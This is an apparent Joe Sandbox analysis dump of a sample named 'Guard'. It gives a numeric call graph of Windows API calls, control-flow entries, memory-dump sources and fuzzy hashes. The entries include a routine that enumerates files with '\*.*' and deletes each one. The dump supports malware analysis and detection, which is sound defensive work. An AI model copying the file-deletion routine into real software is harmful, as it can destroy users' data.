98596->98595 98597 361a36 59 API calls 98596->98597 98598 370119 59 API calls 98596->98598 98599 3617e0 59 API calls 98596->98599 98607 36151f 61 API calls 98596->98607 98597->98596 98598->98596 98599->98596 98602 3b4d09 98601->98602 98606 3b4cf0 98601->98606 98609 3737c3 59 API calls __wcstoi64 98602->98609 98605 3b4d0f 98605->98596 98606->98602 98606->98605 98608 37385c GetStringTypeW _iswctype 98606->98608 98607->98596 98608->98606 98609->98605 98610->98019 98612 361bef _memmove 98611->98612 98613 361bdc 98611->98613 98612->98027 98613->98612 98614 370fe6 Mailbox 59 API calls 98613->98614 98614->98612 98615 3901f8 98616 3901fa 98615->98616 98619 3b4d18 SHGetFolderPathW 98616->98619 98618 390203 98618->98618 98620 361821 59 API calls 98619->98620 98621 3b4d45 98620->98621 98621->98618 98622 351016 98627 365ce7 98622->98627 98625 372f70 __cinit 67 API calls 98626 351025 98625->98626 98628 370fe6 Mailbox 59 API calls 98627->98628 98629 365cef 98628->98629 98630 35101b 98629->98630 98634 365f39 98629->98634 98630->98625 98635 365cfb 98634->98635 98636 365f42 98634->98636 98638 365d13 98635->98638 98637 372f70 __cinit 67 API calls 98636->98637 98637->98635 98639 361207 59 API calls 98638->98639 98640 365d2b GetVersionExW 98639->98640 98641 361821 59 API calls 98640->98641 98642 365d6e 98641->98642 98643 361981 59 API calls 98642->98643 98646 365d9b 98642->98646 98644 365d8f 98643->98644 98645 36133d 59 API calls 98644->98645 98645->98646 98647 365e00 GetCurrentProcess IsWow64Process 98646->98647 98649 3a1098 98646->98649 98648 365e19 98647->98648 98650 365e2f 98648->98650 98651 365e98 GetSystemInfo 98648->98651 98662 3655f0 98650->98662 98652 365e65 98651->98652 98652->98630 98655 365e41 98657 3655f0 2 API calls 98655->98657 98656 365e8c GetSystemInfo 98658 365e56 98656->98658 98659 365e49 GetNativeSystemInfo 98657->98659 98658->98652 98660 365e5c FreeLibrary 98658->98660 98659->98658 98660->98652 98663 365619 98662->98663 98664 3655f9 LoadLibraryA 98662->98664 
98663->98655 98663->98656 98664->98663 98665 36560a GetProcAddress 98664->98665 98665->98663 98666 35107d 98671 362fc5 98666->98671 98668 35108c 98669 372f70 __cinit 67 API calls 98668->98669 98670 351096 98669->98670 98672 362fd5 __write_nolock 98671->98672 98673 361207 59 API calls 98672->98673 98674 36308b 98673->98674 98702 3700cf 98674->98702 98676 363094 98709 3708c1 98676->98709 98683 361207 59 API calls 98684 3630c5 98683->98684 98685 3619e1 59 API calls 98684->98685 98686 3630ce RegOpenKeyExW 98685->98686 98687 3a01a3 RegQueryValueExW 98686->98687 98691 3630f0 Mailbox 98686->98691 98688 3a01c0 98687->98688 98689 3a0235 RegCloseKey 98687->98689 98690 370fe6 Mailbox 59 API calls 98688->98690 98689->98691 98701 3a0247 _wcscat Mailbox __NMSG_WRITE 98689->98701 98692 3a01d9 98690->98692 98691->98668 98693 36433f 59 API calls 98692->98693 98694 3a01e4 RegQueryValueExW 98693->98694 98695 3a0201 98694->98695 98698 3a021b 98694->98698 98696 361821 59 API calls 98695->98696 98696->98698 98697 361609 59 API calls 98697->98701 98698->98689 98699 361a36 59 API calls 98699->98701 98700 364c94 59 API calls 98700->98701 98701->98691 98701->98697 98701->98699 98701->98700 98728 381b70 98702->98728 98705 361a36 59 API calls 98706 370102 98705->98706 98730 370284 98706->98730 98708 37010c Mailbox 98708->98676 98710 381b70 __write_nolock 98709->98710 98711 3708ce GetFullPathNameW 98710->98711 98712 3708f0 98711->98712 98713 361821 59 API calls 98712->98713 98714 36309f 98713->98714 98715 361900 98714->98715 98716 361914 98715->98716 98717 39f534 98715->98717 98740 3618a5 98716->98740 98719 361c7e 59 API calls 98717->98719 98720 39f53f __NMSG_WRITE _memmove 98719->98720 98721 36191f 98722 364c94 98721->98722 98723 364ca2 98722->98723 98727 364cc4 _memmove 98722->98727 98725 370fe6 Mailbox 59 API calls 98723->98725 98724 370fe6 Mailbox 59 API calls 98726 3630bc 98724->98726 98725->98727 98726->98683 98727->98724 98729 3700dc GetModuleFileNameW 98728->98729 98729->98705 98731 
381b70 __write_nolock 98730->98731 98732 370291 GetFullPathNameW 98731->98732 98733 3702b0 98732->98733 98734 3702cd 98732->98734 98736 361821 59 API calls 98733->98736 98735 3619e1 59 API calls 98734->98735 98737 3702bc 98735->98737 98736->98737 98738 36133d 59 API calls 98737->98738 98739 3702c8 98738->98739 98739->98708 98741 3618b4 __NMSG_WRITE 98740->98741 98742 3618c5 _memmove 98741->98742 98743 361c7e 59 API calls 98741->98743 98742->98721 98744 39f4f1 _memmove 98743->98744 98745 351066 98750 35aaaa 98745->98750 98747 35106c 98748 372f70 __cinit 67 API calls 98747->98748 98749 351076 98748->98749 98751 35aacb 98750->98751 98783 3702eb 98751->98783 98755 35ab12 98756 361207 59 API calls 98755->98756 98757 35ab1c 98756->98757 98758 361207 59 API calls 98757->98758 98759 35ab26 98758->98759 98760 361207 59 API calls 98759->98760 98761 35ab30 98760->98761 98762 361207 59 API calls 98761->98762 98763 35ab6e 98762->98763 98764 361207 59 API calls 98763->98764 98765 35ac39 98764->98765 98793 370588 98765->98793 98769 35ac6b 98770 361207 59 API calls 98769->98770 98771 35ac75 98770->98771 98821 36fe2b 98771->98821 98773 35acbc 98774 35accc GetStdHandle 98773->98774 98775 392f39 98774->98775 98776 35ad18 98774->98776 98775->98776 98778 392f42 98775->98778 98777 35ad20 OleInitialize 98776->98777 98777->98747 98828 3b70f3 64 API calls Mailbox 98778->98828 98780 392f49 98829 3b77c2 CreateThread 98780->98829 98782 392f55 CloseHandle 98782->98777 98830 3703c4 98783->98830 98786 3703c4 59 API calls 98787 37032d 98786->98787 98788 361207 59 API calls 98787->98788 98789 370339 98788->98789 98790 361821 59 API calls 98789->98790 98791 35aad1 98790->98791 98792 3707bb 6 API calls 98791->98792 98792->98755 98794 361207 59 API calls 98793->98794 98795 370598 98794->98795 98796 361207 59 API calls 98795->98796 98797 3705a0 98796->98797 98837 3610c3 98797->98837 98800 3610c3 59 API calls 98801 3705b0 98800->98801 98802 361207 59 API calls 98801->98802 98803 3705bb 98802->98803 
98804 370fe6 Mailbox 59 API calls 98803->98804 98805 35ac43 98804->98805 98806 36ff4c 98805->98806 98807 36ff5a 98806->98807 98808 361207 59 API calls 98807->98808 98809 36ff65 98808->98809 98810 361207 59 API calls 98809->98810 98811 36ff70 98810->98811 98812 361207 59 API calls 98811->98812 98813 36ff7b 98812->98813 98814 361207 59 API calls 98813->98814 98815 36ff86 98814->98815 98816 3610c3 59 API calls 98815->98816 98817 36ff91 98816->98817 98818 370fe6 Mailbox 59 API calls 98817->98818 98819 36ff98 RegisterWindowMessageW 98818->98819 98819->98769 98822 3a620c 98821->98822 98823 36fe3b 98821->98823 98840 3ba12a 59 API calls 98822->98840 98824 370fe6 Mailbox 59 API calls 98823->98824 98826 36fe43 98824->98826 98826->98773 98827 3a6217 98828->98780 98829->98782 98841 3b77a8 65 API calls 98829->98841 98831 361207 59 API calls 98830->98831 98832 3703cf 98831->98832 98833 361207 59 API calls 98832->98833 98834 3703d7 98833->98834 98835 361207 59 API calls 98834->98835 98836 370323 98835->98836 98836->98786 98838 361207 59 API calls 98837->98838 98839 3610cb 98838->98839 98839->98800 98840->98827 98842 377e83 98843 377e8f _flsall 98842->98843 98879 37a038 GetStartupInfoW 98843->98879 98845 377e94 98881 378dac GetProcessHeap 98845->98881 98847 377eec 98848 377ef7 98847->98848 98964 377fd3 58 API calls 3 library calls 98847->98964 98882 379d16 98848->98882 98851 377efd 98852 377f08 __RTC_Initialize 98851->98852 98965 377fd3 58 API calls 3 library calls 98851->98965 98903 37d802 98852->98903 98855 377f17 98856 377f23 GetCommandLineW 98855->98856 98966 377fd3 58 API calls 3 library calls 98855->98966 98922 385153 GetEnvironmentStringsW 98856->98922 98859 377f22 98859->98856 98862 377f3d 98863 377f48 98862->98863 98967 3732e5 58 API calls 3 library calls 98862->98967 98932 384f88 98863->98932 98866 377f4e 98867 377f59 98866->98867 98968 3732e5 58 API calls 3 library calls 98866->98968 98946 37331f 98867->98946 98870 377f61 98871 377f6c __wwincmdln 98870->98871 98969 
3732e5 58 API calls 3 library calls 98870->98969 98952 365f8b 98871->98952 98874 377f80 98875 377f8f 98874->98875 98970 373588 58 API calls _doexit 98874->98970 98971 373310 58 API calls _doexit 98875->98971 98878 377f94 _flsall 98880 37a04e 98879->98880 98880->98845 98881->98847 98972 3733b7 36 API calls 2 library calls 98882->98972 98884 379d1b 98973 379f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98884->98973 98886 379d24 98974 379d8c 61 API calls 2 library calls 98886->98974 98887 379d20 98887->98886 98975 379fba TlsAlloc 98887->98975 98890 379d29 98890->98851 98891 379d36 98891->98886 98892 379d41 98891->98892 98976 378a05 98892->98976 98895 379d83 98984 379d8c 61 API calls 2 library calls 98895->98984 98898 379d62 98898->98895 98900 379d68 98898->98900 98899 379d88 98899->98851 98983 379c63 58 API calls 4 library calls 98900->98983 98902 379d70 GetCurrentThreadId 98902->98851 98904 37d80e _flsall 98903->98904 98905 379e3b __lock 58 API calls 98904->98905 98906 37d815 98905->98906 98907 378a05 __calloc_crt 58 API calls 98906->98907 98909 37d826 98907->98909 98908 37d891 GetStartupInfoW 98916 37d8a6 98908->98916 98917 37d9d5 98908->98917 98909->98908 98910 37d831 _flsall @_EH4_CallFilterFunc@8 98909->98910 98910->98855 98911 37da9d 98998 37daad LeaveCriticalSection _doexit 98911->98998 98913 378a05 __calloc_crt 58 API calls 98913->98916 98914 37da22 GetStdHandle 98914->98917 98915 37da35 GetFileType 98915->98917 98916->98913 98916->98917 98918 37d8f4 98916->98918 98917->98911 98917->98914 98917->98915 98997 37a05b InitializeCriticalSectionAndSpinCount 98917->98997 98918->98917 98919 37d928 GetFileType 98918->98919 98996 37a05b InitializeCriticalSectionAndSpinCount 98918->98996 98919->98918 98923 377f33 98922->98923 98924 385164 98922->98924 98928 384d4b GetModuleFileNameW 98923->98928 98999 378a4d 58 API calls 2 library calls 98924->98999 98926 3851a0 FreeEnvironmentStringsW 98926->98923 98927 38518a _memmove 98927->98926 98929 384d7f 
_wparse_cmdline 98928->98929 98931 384dbf _wparse_cmdline 98929->98931 99000 378a4d 58 API calls 2 library calls 98929->99000 98931->98862 98933 384fa1 __NMSG_WRITE 98932->98933 98937 384f99 98932->98937 98934 378a05 __calloc_crt 58 API calls 98933->98934 98942 384fca __NMSG_WRITE 98934->98942 98935 385021 98936 372f85 _free 58 API calls 98935->98936 98936->98937 98937->98866 98938 378a05 __calloc_crt 58 API calls 98938->98942 98939 385046 98940 372f85 _free 58 API calls 98939->98940 98940->98937 98942->98935 98942->98937 98942->98938 98942->98939 98943 38505d 98942->98943 99001 384837 58 API calls __write_nolock 98942->99001 99002 378ff6 IsProcessorFeaturePresent 98943->99002 98945 385069 98945->98866 98947 37332b __IsNonwritableInCurrentImage 98946->98947 99025 37a701 98947->99025 98949 373349 __initterm_e 98950 372f70 __cinit 67 API calls 98949->98950 98951 373368 __cinit __IsNonwritableInCurrentImage 98949->98951 98950->98951 98951->98870 98953 365fa5 98952->98953 98963 366044 98952->98963 98954 365fdf IsThemeActive 98953->98954 99028 37359c 98954->99028 98958 36600b 99040 365f00 SystemParametersInfoW SystemParametersInfoW 98958->99040 98960 366017 99041 365240 98960->99041 98962 36601f SystemParametersInfoW 98962->98963 98963->98874 98964->98848 98965->98852 98966->98859 98970->98875 98971->98878 98972->98884 98973->98887 98974->98890 98975->98891 98977 378a0c 98976->98977 98979 378a47 98977->98979 98981 378a2a 98977->98981 98985 385426 98977->98985 98979->98895 98982 37a016 TlsSetValue 98979->98982 98981->98977 98981->98979 98993 37a362 Sleep 98981->98993 98982->98898 98983->98902 98984->98899 98986 385431 98985->98986 98990 38544c 98985->98990 98987 38543d 98986->98987 98986->98990 98994 378d58 58 API calls __getptd_noexit 98987->98994 98988 38545c HeapAlloc 98988->98990 98991 385442 98988->98991 98990->98988 98990->98991 98995 3735d1 DecodePointer 98990->98995 98991->98977 98993->98981 98994->98991 98995->98990 98996->98918 98997->98917 98998->98910 
98999->98927 99000->98931 99001->98942 99003 379001 99002->99003 99008 378e89 99003->99008 99007 37901c 99007->98945 99009 378ea3 _memset __call_reportfault 99008->99009 99010 378ec3 IsDebuggerPresent 99009->99010 99016 37a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99010->99016 99013 378f87 __call_reportfault 99017 37c826 99013->99017 99014 378faa 99015 37a370 GetCurrentProcess TerminateProcess 99014->99015 99015->99007 99016->99013 99018 37c830 IsProcessorFeaturePresent 99017->99018 99019 37c82e 99017->99019 99021 385b3a 99018->99021 99019->99014 99024 385ae9 5 API calls 2 library calls 99021->99024 99023 385c1d 99023->99014 99024->99023 99026 37a704 EncodePointer 99025->99026 99026->99026 99027 37a71e 99026->99027 99027->98949 99029 379e3b __lock 58 API calls 99028->99029 99030 3735a7 DecodePointer EncodePointer 99029->99030 99093 379fa5 LeaveCriticalSection 99030->99093 99032 366004 99033 373604 99032->99033 99034 373628 99033->99034 99035 37360e 99033->99035 99034->98958 99035->99034 99094 378d58 58 API calls __getptd_noexit 99035->99094 99037 373618 99095 378fe6 9 API calls __write_nolock 99037->99095 99039 373623 99039->98958 99040->98960 99042 36524d __write_nolock 99041->99042 99043 361207 59 API calls 99042->99043 99044 365258 GetCurrentDirectoryW 99043->99044 99096 364ec8 99044->99096 99046 36527e IsDebuggerPresent 99047 36528c 99046->99047 99048 3a0b21 MessageBoxA 99046->99048 99049 3a0b39 99047->99049 99050 3652a0 99047->99050 99048->99049 99299 36314d 99049->99299 99164 3631bf 99050->99164 99053 3a0b49 99060 3a0b5f SetCurrentDirectoryW 99053->99060 99055 3652be GetFullPathNameW 99056 361821 59 API calls 99055->99056 99058 3652f9 99056->99058 99057 36535f SetCurrentDirectoryW 99059 36536c Mailbox 99057->99059 99180 35bbc6 99058->99180 99059->98962 99060->99059 99079 365358 99079->99057 99093->99032 99094->99037 99095->99039 99097 361207 59 API calls 99096->99097 99098 364ede 99097->99098 99308 365420 99098->99308 99100 364efc 99101 3619e1 
59 API calls 99100->99101 99102 364f10 99101->99102 99103 361c9c 59 API calls 99102->99103 99104 364f1b 99103->99104 99322 35477a 99104->99322 99107 361a36 59 API calls 99108 364f34 99107->99108 99325 3539be 99108->99325 99110 364f44 Mailbox 99111 361a36 59 API calls 99110->99111 99112 364f68 99111->99112 99113 3539be 68 API calls 99112->99113 99114 364f77 Mailbox 99113->99114 99115 361207 59 API calls 99114->99115 99116 364f94 99115->99116 99329 3655bc 99116->99329 99120 364fae 99121 3a0a54 99120->99121 99122 364fb8 99120->99122 99124 3655bc 59 API calls 99121->99124 99123 37312d _W_store_winword 60 API calls 99122->99123 99125 364fc3 99123->99125 99126 3a0a68 99124->99126 99125->99126 99127 364fcd 99125->99127 99128 3655bc 59 API calls 99126->99128 99129 37312d _W_store_winword 60 API calls 99127->99129 99130 3a0a84 99128->99130 99131 364fd8 99129->99131 99133 3700cf 61 API calls 99130->99133 99131->99130 99132 364fe2 99131->99132 99134 37312d _W_store_winword 60 API calls 99132->99134 99135 3a0aa7 99133->99135 99136 364fed 99134->99136 99137 3655bc 59 API calls 99135->99137 99138 364ff7 99136->99138 99139 3a0ad0 99136->99139 99140 3a0ab3 99137->99140 99141 36501b 99138->99141 99145 361c9c 59 API calls 99138->99145 99142 3655bc 59 API calls 99139->99142 99144 361c9c 59 API calls 99140->99144 99149 3547be 59 API calls 99141->99149 99143 3a0aee 99142->99143 99146 361c9c 59 API calls 99143->99146 99147 3a0ac1 99144->99147 99148 36500e 99145->99148 99151 3a0afc 99146->99151 99152 3655bc 59 API calls 99147->99152 99153 3655bc 59 API calls 99148->99153 99150 36502a 99149->99150 99154 354540 59 API calls 99150->99154 99155 3655bc 59 API calls 99151->99155 99152->99139 99153->99141 99156 365038 99154->99156 99157 3a0b0b 99155->99157 99345 3543d0 99156->99345 99157->99157 99159 35477a 59 API calls 99161 365055 99159->99161 99160 3543d0 59 API calls 99160->99161 99161->99159 99161->99160 99162 3655bc 59 API calls 99161->99162 99163 36509b Mailbox 99161->99163 99162->99161 
99163->99046 99165 3631cc __write_nolock 99164->99165 99166 3631e5 99165->99166 99167 3a0314 _memset 99165->99167 99168 370284 60 API calls 99166->99168 99169 3a0330 GetOpenFileNameW 99167->99169 99170 3631ee 99168->99170 99171 3a037f 99169->99171 99360 3709c5 99170->99360 99173 361821 59 API calls 99171->99173 99175 3a0394 99173->99175 99175->99175 99177 363203 99378 36278a 99177->99378 99181 35bbd3 __write_nolock 99180->99181 100185 362cb2 99181->100185 99300 3631b0 99299->99300 99301 36315b 99299->99301 99302 370fe6 Mailbox 59 API calls 99300->99302 99303 370fe6 Mailbox 59 API calls 99301->99303 99304 36316c 99301->99304 99302->99304 99303->99304 99305 36436a 59 API calls 99304->99305 99306 363184 99305->99306 99306->99053 99309 36542d __write_nolock 99308->99309 99310 361821 59 API calls 99309->99310 99316 365590 Mailbox 99309->99316 99312 36545f 99310->99312 99311 361609 59 API calls 99311->99312 99312->99311 99321 365495 Mailbox 99312->99321 99313 361609 59 API calls 99313->99321 99314 365563 99315 361a36 59 API calls 99314->99315 99314->99316 99317 365584 99315->99317 99316->99100 99319 364c94 59 API calls 99317->99319 99318 361a36 59 API calls 99318->99321 99319->99316 99320 364c94 59 API calls 99320->99321 99321->99313 99321->99314 99321->99316 99321->99318 99321->99320 99323 370fe6 Mailbox 59 API calls 99322->99323 99324 354787 99323->99324 99324->99107 99326 3539c9 99325->99326 99327 3539f0 99326->99327 99354 353ea3 68 API calls Mailbox 99326->99354 99327->99110 99330 3655c6 99329->99330 99331 3655df 99329->99331 99332 361c9c 59 API calls 99330->99332 99333 361821 59 API calls 99331->99333 99334 364fa0 99332->99334 99333->99334 99335 37312d 99334->99335 99336 3731ae 99335->99336 99337 373139 99335->99337 99357 3731c0 60 API calls 3 library calls 99336->99357 99344 37315e 99337->99344 99355 378d58 58 API calls __getptd_noexit 99337->99355 99339 3731bb 99339->99120 99341 373145 99356 378fe6 9 API calls __write_nolock 99341->99356 99343 373150 99343->99120 
99344->99120 99346 38d6c9 99345->99346 99351 3543e7 99345->99351 99346->99351 99359 3540cb 59 API calls Mailbox 99346->99359 99348 3544ef 99348->99161 99349 354530 99358 35523c 59 API calls 99349->99358 99350 3544e8 99353 370fe6 Mailbox 59 API calls 99350->99353 99351->99348 99351->99349 99351->99350 99353->99348 99354->99327 99355->99341 99356->99343 99357->99339 99358->99348 99359->99351 99361 381b70 __write_nolock 99360->99361 99362 3709d2 GetLongPathNameW 99361->99362 99363 361821 59 API calls 99362->99363 99364 3631f7 99363->99364 99365 362f3d 99364->99365 99366 361207 59 API calls 99365->99366 99367 362f4f 99366->99367 99368 370284 60 API calls 99367->99368 99369 362f5a 99368->99369 99370 362f65 99369->99370 99371 3a0177 99369->99371 99372 364c94 59 API calls 99370->99372 99376 3a0191 99371->99376 99418 36151f 61 API calls 99371->99418 99374 362f71 99372->99374 99412 351307 99374->99412 99377 362f84 Mailbox 99377->99177 99419 3649c2 99378->99419 99381 39f8d6 99536 3b9b16 122 API calls 2 library calls 99381->99536 99383 3649c2 136 API calls 99385 3627c3 99383->99385 99384 39f8e7 99386 39f908 99384->99386 99387 39f8eb 99384->99387 99385->99381 99388 3627cb 99385->99388 99390 370fe6 Mailbox 59 API calls 99386->99390 99537 364a2f 99387->99537 99391 3627d7 99388->99391 99392 39f8f3 99388->99392 99397 39f94d Mailbox 99390->99397 99443 3629be 99391->99443 99543 3b47e8 90 API calls _wprintf 99392->99543 99396 39f901 99396->99386 99398 39fb01 99397->99398 99402 39fb12 99397->99402 99403 36343f 59 API calls 99397->99403 99409 361a36 59 API calls 99397->99409 99544 3afef8 59 API calls 2 library calls 99397->99544 99545 3afe19 61 API calls 2 library calls 99397->99545 99546 3b793a 59 API calls Mailbox 99397->99546 99547 363297 99397->99547 99399 372f85 _free 58 API calls 99398->99399 99400 39fb09 99399->99400 99401 364a2f 84 API calls 99400->99401 99401->99402 99406 372f85 _free 58 API calls 99402->99406 99407 364a2f 84 API calls 99402->99407 99553 3aff5c 89 API calls 4 
library calls 99402->99553 99403->99397 99406->99402 99407->99402 99409->99397 99413 351319 99412->99413 99417 351338 _memmove 99412->99417 99415 370fe6 Mailbox 59 API calls 99413->99415 99414 370fe6 Mailbox 59 API calls 99416 35134f 99414->99416 99415->99417 99416->99377 99417->99414 99418->99371 99554 364b29 99419->99554 99424 3a08bb 99427 364a2f 84 API calls 99424->99427 99425 3649ed LoadLibraryExW 99564 364ade 99425->99564 99429 3a08c2 99427->99429 99431 364ade 3 API calls 99429->99431 99433 3a08ca 99431->99433 99432 364a14 99432->99433 99434 364a20 99432->99434 99590 364ab2 99433->99590 99436 364a2f 84 API calls 99434->99436 99438 3627af 99436->99438 99438->99381 99438->99383 99440 3a08f1 99596 364a6e 99440->99596 99442 3a08fe 99444 3629e7 99443->99444 99445 39fd14 99443->99445 99447 363df7 60 API calls 99444->99447 100007 3aff5c 89 API calls 4 library calls 99445->100007 99449 362a09 99447->99449 99448 39fd27 100008 3aff5c 89 API calls 4 library calls 99448->100008 99450 363e47 67 API calls 99449->99450 99451 362a1e 99450->99451 99451->99448 99453 362a26 99451->99453 99454 361207 59 API calls 99453->99454 99456 362a32 99454->99456 99455 39fd43 99487 362a93 99455->99487 100005 370b8b 60 API calls __write_nolock 99456->100005 99458 362a3e 99461 361207 59 API calls 99458->99461 99459 362aa1 99463 361207 59 API calls 99459->99463 99460 39fd56 99462 3642cf CloseHandle 99460->99462 99464 362a4a 99461->99464 99465 39fd62 99462->99465 99466 362aaa 99463->99466 99467 370284 60 API calls 99464->99467 99468 3649c2 136 API calls 99465->99468 99469 361207 59 API calls 99466->99469 99471 362a58 99467->99471 99472 39fd7e 99468->99472 99470 362ab3 99469->99470 99473 370119 59 API calls 99470->99473 99474 363ea1 2 API calls 99471->99474 99475 39fda3 99472->99475 100009 3b9b16 122 API calls 2 library calls 99472->100009 99476 362aca 99473->99476 99478 362a84 99474->99478 100010 3aff5c 89 API calls 4 library calls 99475->100010 99481 3617e0 59 API calls 99476->99481 99483 

Control-flow Graph

control_flow_graph 1527 3b4005-3b404c call 361207 * 3 call 370284 call 3b4fec 1538 3b404e-3b4057 call 361900 1527->1538 1539 3b405c-3b408d call 370119 FindFirstFileW 1527->1539 1538->1539 1543 3b408f-3b4091 1539->1543 1544 3b40fc-3b4103 FindClose 1539->1544 1543->1544 1546 3b4093-3b4098 1543->1546 1545 3b4107-3b4129 call 361cb6 * 3 1544->1545 1548 3b409a-3b40d5 call 361c9c call 3617e0 call 361900 DeleteFileW 1546->1548 1549 3b40d7-3b40e9 FindNextFileW 1546->1549 1548->1549 1562 3b40f3-3b40fa FindClose 1548->1562 1549->1543 1551 3b40eb-3b40f1 1549->1551 1551->1543 1562->1545
APIs
  • Part of subcall function 00370284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00362A58,?,00008000), ref: 003702A4
  • Part of subcall function 003B4FEC: GetFileAttributesW.KERNEL32(?,003B3BFE), ref: 003B4FED
• FindFirstFileW.KERNEL32(?,?), ref: 003B407C
• DeleteFileW.KERNEL32(?,?,?,?), ref: 003B40CC
• FindNextFileW.KERNEL32(00000000,00000010), ref: 003B40DD
• FindClose.KERNEL32(00000000), ref: 003B40F4
• FindClose.KERNEL32(00000000), ref: 003B40FD
Strings
Memory Dump Source
• Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
• Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_350000_Guard.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 9acab23574d534bfa293c9b687ae806000f72e1c3ada8ffd9807317e9b2d835e
• Instruction ID: b43831594533d70bc5b5a92aaee20a4631fe5a203a46e07c7b6319c9401a9391
• Opcode Fuzzy Hash: 9acab23574d534bfa293c9b687ae806000f72e1c3ada8ffd9807317e9b2d835e
• Instruction Fuzzy Hash: AF318E310083859BC316FF60C8959EFB7ECBE91305F444E2DF6E586192EB20DA09C7A6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00363740: CharUpperBuffW.USER32(?,004171DC,00000000,?,00000000,004171DC,?,003553A5,?,?,?,?), ref: 0036375D
                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0035B68A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2819905725-0
                                                                                                                                                                                                                    • Opcode ID: dcd1713ca37a3797d89a8146597228f03e22af8375665038466908ff38a291d2
                                                                                                                                                                                                                    • Instruction ID: 229d5760c766e09dfbfdced3d787e1dc5b1f276b285c5a8f999564020027e746
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd1713ca37a3797d89a8146597228f03e22af8375665038466908ff38a291d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65A277B46087418FCB22CF18C480B2AF7E5BF89304F15895DE89A8B761D775ED49CB92
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0039FC86), ref: 003B495A
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003B496B
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003B497B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                                                                                    • Opcode ID: e364174ad57e50b4c0f75b613d9ab4341645b31afc4799ff9518d06ec0653861
                                                                                                                                                                                                                    • Instruction ID: fb9cacfb7178fd46e35f5a9846e483fcfceefade84c747184d4c839aa1507899
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e364174ad57e50b4c0f75b613d9ab4341645b31afc4799ff9518d06ec0653861
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE02631810505AB8226673CEC8D8EB779C9F0637DF100B05FA35C64E1FBB09D8486DA

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
